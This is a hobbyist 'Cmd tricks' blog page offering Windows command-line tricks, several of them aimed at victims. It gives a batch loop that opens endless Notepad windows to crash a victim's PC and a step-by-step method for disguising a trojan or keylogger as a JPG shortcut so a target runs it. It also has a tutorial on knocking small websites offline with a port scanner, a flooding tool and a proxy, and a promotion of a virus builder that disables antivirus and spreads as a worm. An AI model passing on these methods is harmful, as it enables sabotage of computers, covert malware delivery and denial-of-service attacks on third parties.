Latest Post

Open Unlimited Notepad and crash victim's PC(Cmd Trick)

Open Unlimited Notepad and crash victim's PC




Today i am going to show you really cool notepad trick. It will open unlimited notepad's and eventually freeze and crash your victim’s pc. Just follow the below steps:
  • Open notepad
  • Copy following text there
    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top
  • Save the file as *.bat or note.bat
  • Open the file in victim’s computer
  • See their expression.
  • You are done.

Note:Please don’t try it on your pc , you can only close it by forcely shutdown your windows.

Notepad trick: Open Cmd with *.bat file

  • Open notepad
  • Type in following code:
    start command.com
  • Save the file as cmd.bat
  • Open the file
  • Done.
I hope you like this post.
Enjoy


 

How to reset BIOS password using cmd(Cmd Trick)


How to reset BIOS password using cmd

In the previous article, I have told how to reset BIOS password using hardware methods. Now I am going to tell you how to reset BIOS Password using Command Prompt.
Yes!!! We can do it by using MS DOS Command. Let us see:

This method works only if you have access to the system when its turned on because this method requires MS DOS. Open MS DOS from programs
menu and provide following commands one bye one:

debug
o 70 2E
o 71 FF
quit


NOTE: The first character in the above commands is "O" and not the number 0.
After providing the above commands, restart your system and it should reset the CMOS Settings along with the BIOS password.
If you are curious to know how it works? then let me explain the above commands:
In this method we are using the Debug tool of MS DOS. The "O" character present at first in these commands, outputs the values to IO ports. The number 70 and 71 are port numbers which are used to access CMOS memory. By providing FF value we are telling CMOS that there is an invalid checksum and it resets the CMOS settings as well as BIOS password.


 

Open website using cmd (Cmd Trick)


Open website using cmd


Have you ever thought that websites can be opened through command prompt in Windows......Yes it is possible to open a website through command prompt.there are many ways which i will discuss today....

Procedure 1 :

1.) Goto Start -> All Programs -> Accessories ->command prompt. Right click and choose run as administrator.

2.) Type: start www.google.com and hit enter.
3.) Website will open in your default browser.

Procedure 2 :

1.) Goto Start -> All Programs -> Accessories ->command prompt. Right click and choose run as administrator.
2.) Type: rundll32 url.dll,FileProtocolHandler www.google.com and hit enter.
3.) Website will open in your default browser.


 

Restrict Access to folder/file using cmd(Cmd Trick)

Restrict Access to folder/file using cmd




You may have seen may software to lock the folder/files and you may also have seen batch programs to do the same. Today I am going to share with you a Basic Dos Command which will help you to Restrict Access to Folder/File. The only thing you need for this is the Administrator Access on Windows Machine.
Follow the Below Given Steps to restrict access:

1.) Open Command Prompt in Windows
 2.) Type the Following Command :
   cacls "<path of file/folder>" /E /P everyone:n
   For example: calcs "C:\users\Administrator\Desktop\Lock.txt" /E /P everyone :n
3.) Remember that path of file/folder should be in double quotes (""). You will get the following message on Success
"Processed File: C:\users\Administrator\Desktop\Lock.txt"
4.) Now when you try to open the File/Folder You will get the message "Access is denied".

Now to Unlock Folder/File and to give it the full access, follow below given steps:

1.) Open Command Prompt in Windows
2.) Type the Following Command :
   cacls "<path of file/folder>" /E /P everyone:f
   For example: calcs "C:\users\Administrator\Desktop\Lock.txt" /E /P everyone :f
3.) Remember that path of file/folder should be in double quotes (""). You will get the following message on Success
"Processed File: C:\users\Administrator\Desktop\Lock.txt"
4.) You have successfully unlocked the file/folder


 

Hide Your Partitions for Better Security(Cmd Trick)

Hide Your Partitions for Better Security




How To Hide Partitions for Better Security



There is so many peoples want to hide for their security reason. This trick will help you to hide your HDD Partitions. But if your opponent is really smart he / she can easily find your files out. In this case I would suggest you to use True Crypt. This software can create an Encrypted Virtual HDD for your Secret files.

Step 1: Open run , type cmd.

Step 2: Type DiskPart in command prompt

Step 3: Type List volume

Step 4: select the volume which u want to hide . and type select volume 4(in my case volume 4 is for my G: drive)

Step 5: then type remove letter G

Now no-one can access your drive even by typing address in url

To get your drive back 





Step 1: Open run , type cmd.

Step 2: Type DiskPart in command prompt

Step 3: Type List volume

Step 4: select the volume in which no drive letter is displaying 

Step 5: type assign letter g


 

Hide EXE File into JPG (Cmd Trick)


Hide EXE File into JPG

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.


 

How To Crash Small Websites- Tutorial(Cmd Trick)


How To Crash Small Websites- Tutorial


So your friend or your enemy has made a little shitty website for whatever maybe a private server or anything.. And your feeling devious and want to crash it.ok after this tutorial go for it.
TOOLS:
>>Port Scanner<< (Download any Port Scanner) >>rDos<<==> Download Link Click Here
>>HotSpotSheild Proxy!<< ( You can use other Proxy to Hide your IP) Step One: First we need to find the websites IP Adress. This is very easy to do. Assume the URL is http://www.yoursite.com . Now Open your Cmd by press Start>Run>cmd .After opened cmd type ping http://www.yoursite.com then press enter and you will get the ip of the victims website. (YOU MUST REMOVE HTTP:// AND ANY /’s)


Step Two: Now you must test to see port 80 is opened or not (usually it is opened).
This is very easy process. Open the port scanner that you have been downloaded .
In port scanner type your Victims ip that you got from step 1.
It will ask you to do a range scan or a full scan (SELECT RANGE SCAN!) then It will ask for conformation you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.
[X] = Closed
[X] Vulnerable = Open


Step Three : ALMOST DONE:
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is opened then you are on the way of crashing!!
Now open your rDos that you have downloaded.
Enter your victims ip that you got from step 1.
It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work.
Hit enter.. *=Flooding -=Crashed Or didn’t connect!
EXAMPLE:

Happy Hacking :D


 

Top 10 Features of( Windows Tips)

Have you all upgrade your PC to Windows 8 operating system? So how is the new OS? Today's Computer World article is about Windows 8. Let's have a short look on Windows 8 operating system's top 10 features. Here, the simply infographic shows you the top 10 features of Windows 8 OS.


Top 10 Features of Windows 8 [Infographic


Source : Visual.ly

Dear Friends !!! I kindly request you all to LIKE our Facebook Fan Page.
LIKE us on Facebook & Get Daily updates Easily.


 

Download Free Avast AntiVirus 7.0, Now Supports (Windows Tips )

There are many free Anti-virus software available in internet. In this huge list we can introduce Avast as one of the best antivirus program. Avast is one of the best and free antivirus software to protect PCs from threats. Over 170 million computer users are using Avast as their Anti-virus to protect their PC against viruses and malware.


Avast image


Avast is the first free antivirus software which has been fully support with Microsoft's Windows 8 operating system and now this free version is offered in the Windows Store. I recommend this free Avast 7.0.1474 to all the Windows 8 users. If you're using Windows 8 as your OS, Avast is the best free antivirus software to your PC.

Click here to Download Avast 7.0.1474


 

How to Create Virus Using JPS (How-tos)

Virus and Fun image
This is a small but very useful software . With the help of this you can create any type of trojans and program it to do whatever you want.
This can be programmed to do the following things:
Disable Registry Editor
Disable Ms Config
Disable Task Manager
Disable Yahoo! Messenger
Disable Media Player
Disable Internet Explorer
Disable Time
Disable Group Policy
Disable Windows Explorer
Disable Norton Antivirus
Disable McAfee Antivirus
Disable Note Pad
Disable Word Pad
Disable Winows
Disable DHCP Client Service
Disable Taskbar
Disable Start Button
Disable MSN Messenger
Disable Command Prompt
Disable Security Center
Disable MSN Messenger
Disable System Restore
Disable Control Panel
Disable Desktop Icons
Disable Screen Saver
Hide Service Manager
Hide Outlook Express
Hide Windows Clock
Hide Desktop Icons
Hide All Process in Task Manager
Hide All Tasks in Task Manager
Hide Run in Start Menu
Change Explorer Caption
Clear Windows XP Password
Swap Mouse Buttons
Remove Folder Options
Lock Mouse & Keyboards
Mute Sound
Crazy Mouse
Allways CD-ROM Open
Turn Off Monitor (30 sec's)
Destroy Taskbar
Destroy Offlines (Y!Messenger)
Destroy Protected Strorage
Destroy Audio Service
Destroy Clipboard
Terminate Windows
Hide Cursor
Auto Startup
Restart-Logoff-Turnoff-Hibrinate Automatic After 30 minutes
Change Server Name After Install in Process
Change Server Name
Change XP Password
Change Computer Name
Change IE Home Page
Close Custom Windows
Disable Custom Service
Disable Process
Open Custom Website
Run Custom Command
Enable Convert To Worm - Auto Copy Server To Active Path With Custom Name & Time
Change Custom Icon For your created Virus (15 Icons)



NOTE
THIS IS A VIRUS MAKING SOFTWARE SO SOME ANTIVIRUS MAY DETECT IS AS A VIRUS BUT ACTUALLY IT IS NOT A VIRUS. SO DON'T WORRY.
CAUTION
DON'T TRY TO OPEN THE CREATED VIRUS ON YOUR OWN COMP.


 
 

Copyright © 2011. Tricks Duniya - All Rights Reserved